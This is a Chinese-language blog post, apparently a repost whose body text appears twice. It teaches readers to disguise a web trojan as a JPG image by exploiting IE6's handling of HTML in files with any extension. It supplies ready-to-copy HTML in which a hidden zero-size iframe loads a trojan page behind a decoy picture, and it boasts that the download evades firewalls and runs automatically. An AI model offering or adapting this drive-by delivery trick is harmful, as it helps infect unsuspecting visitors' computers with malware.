分做利用IE6.0漏洞,伪装成图片的网页木马
[ 2010-05-03 09:23:40 | 作者: admin ]
p.s. 一些网友通过伪造图片绕过各论坛的上传系统,从而将代码隐藏在图片文件中以获得执行。将HTML代码伪装成GIF图片后,浏览器在对其进行解析的时候会将其中隐藏的HTML或客户端脚本代码解释执行,但所幸的是服务器端脚本不会被执行。目前的大多数论坛、或博客等CMS系统均无法有效识别和阻止这种伪造的GIF文件上传。另外火狐内核的浏览器则不会执行。
特点:
1 针对任何没有打过补丁的IE6版本都有效!
2 木马下载过程中防火墙不会做任何反应!
3 木马地址以jpg为后缀名。列如 http://xxx.xxx.xxx.xxx/003.jpg 和一般的图片地址无任何俩样!打开地址后在浏览器上会和正常情况下一样出现图片!但木马却已经在后台下载并在下载完成后自动执行!具有很强的迷惑性!
首先我要给大家说的是以下所讲的东西极其简单,只需要你稍微懂得一点HTML语言,你就能够做出各式各样的网页木马。。。不懂也没关系,,文章里会提供现成的代码让你复制!好了,,废话少说,入正题!
网页木马至今已出了很多代,品种格式各样,目前最新最实用的是针对各种IE版本都有效的网页木马,我们统称它们IE6.0木马。
根据网上的相关贴子里的教材如果你已经成功的制作出了IE6.0网页木马。那么我们继续下一步,修改网页木马的地址的后缀名!
一般来说,我们做出来的网页木马地址都是以 htm 或html 结尾!那么我们怎么修改呢?很简单!
不知道大家知道不知道。IE有一个很小的BUG。即只要网站文件里有html码它就会执行,并不理会文件后缀名是什么。
于是我们可以这么来修改网页木马的后缀名,其实说准确一点并不是修改点网页木马的地址后缀名,是利用一个图片地址来打开这个网页木马!
打开记事本写入如下一段代码:
<html>
<iframe src="IE6.0网页木马地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="图片地址"></center>
</html>
然后将其另存为XXX.jpg 。
剩下的工作就是将这个XXX.jpg图片格式的文件上传的你的空间,给出相对路径让别人访问了!
别人在访问这个XXX.jpg文件时。。浏览器会将文件内的html码执行,根据代码的内容。你的网页木马地址会作为隐藏窗口被打开。。另外那个图片也会出现在对方所打开的网页上!
评论Feed: http://blog.xg98.com/feed.asp?q=comment&id=1398
特点:
1 针对任何没有打过补丁的IE6版本都有效!
2 木马下载过程中防火墙不会做任何反应!
3 木马地址以jpg为后缀名。列如 http://xxx.xxx.xxx.xxx/003.jpg 和一般的图片地址无任何俩样!打开地址后在浏览器上会和正常情况下一样出现图片!但木马却已经在后台下载并在下载完成后自动执行!具有很强的迷惑性!
首先我要给大家说的是以下所讲的东西极其简单,只需要你稍微懂得一点HTML语言,你就能够做出各式各样的网页木马。。。不懂也没关系,,文章里会提供现成的代码让你复制!好了,,废话少说,入正题!
网页木马至今已出了很多代,品种格式各样,目前最新最实用的是针对各种IE版本都有效的网页木马,我们统称它们IE6.0木马。
根据网上的相关贴子里的教材如果你已经成功的制作出了IE6.0网页木马。那么我们继续下一步,修改网页木马的地址的后缀名!
一般来说,我们做出来的网页木马地址都是以 htm 或html 结尾!那么我们怎么修改呢?很简单!
不知道大家知道不知道。IE有一个很小的BUG。即只要网站文件里有html码它就会执行,并不理会文件后缀名是什么。
于是我们可以这么来修改网页木马的后缀名,其实说准确一点并不是修改点网页木马的地址后缀名,是利用一个图片地址来打开这个网页木马!
打开记事本写入如下一段代码:
<html>
<iframe src="IE6.0网页木马地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="图片地址"></center>
</html>
然后将其另存为XXX.jpg 。
剩下的工作就是将这个XXX.jpg图片格式的文件上传的你的空间,给出相对路径让别人访问了!
别人在访问这个XXX.jpg文件时。。浏览器会将文件内的html码执行,根据代码的内容。你的网页木马地址会作为隐藏窗口被打开。。另外那个图片也会出现在对方所打开的网页上!
评论Feed: http://blog.xg98.com/feed.asp?q=comment&id=1398
这篇日志没有评论。
此日志不可发表评论。
